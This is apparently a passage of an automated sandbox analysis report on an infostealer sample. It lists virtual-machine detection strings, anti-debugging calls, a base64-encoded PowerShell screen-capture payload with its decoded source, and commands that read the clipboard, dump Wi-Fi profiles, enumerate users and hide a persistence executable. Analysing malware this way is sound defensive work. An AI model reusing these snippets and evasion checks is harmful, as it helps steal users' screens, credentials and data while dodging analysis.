Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: elif b"vmware" in stdout2.lower():
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu0{
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441219336.0000018B472C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437747781.0000018B472BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: [1VMware0g
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: net1.exe, 0000003B.00000002.2232321509.0000010E3AB98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Administrators
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray.exe0l
Source: sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat ServicevmicheartbeatHyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServF/
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
Source: ROUTE.EXE, 00000045.00000002.2254301390.0000019424DC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vboxtray.exe", # VirtualBox
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b'VMware'
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426421172.0000018B49CB9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435662946.0000018B4A1C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444712748.0000018B47CB0000.00000004.00001000.00020000.00000000.sdmp, sc.exe, 00000048.00000002.2258659401.0000022125EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exepk
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exep
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 'qemu'
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc.exe0o
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwarepy
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b'VMware'g
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe"pm
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447553924.0000018B4A1C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: ARP.EXE, 00000046.00000002.2256312580.0000015ABB729000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmusrvc.exe"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446982591.0000018B49D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "qemu-ga.exe"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmacthlp.exe", # VMware
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D14241 2_2_00007FFD93D14241
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D1572C 2_2_00007FFD93D1572C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D132F6 rdtsc 2_2_00007FFD93D132F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B2B6D12C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD94064460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FFD94064460
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B83480 GetProcessHeap, 0_2_00007FF7B2B83480
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\NETSTAT.EXE Process token adjusted: Debug
Source: C:\Windows\System32\NETSTAT.EXE Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B2B6D12C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6D30C SetUnhandledExceptionFilter, 0_2_00007FF7B2B6D30C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7B2B6C8A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B2B7A614
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B6D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF7B2B6D12C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B6D30C SetUnhandledExceptionFilter, 2_2_00007FF7B2B6D30C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B6C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00007FF7B2B6C8A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B7A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF7B2B7A614
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF3068 IsProcessorFeaturePresent,00007FFDA54619A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFDA54619A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FFD93BF3068
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D15A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FFD93D15A1F

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
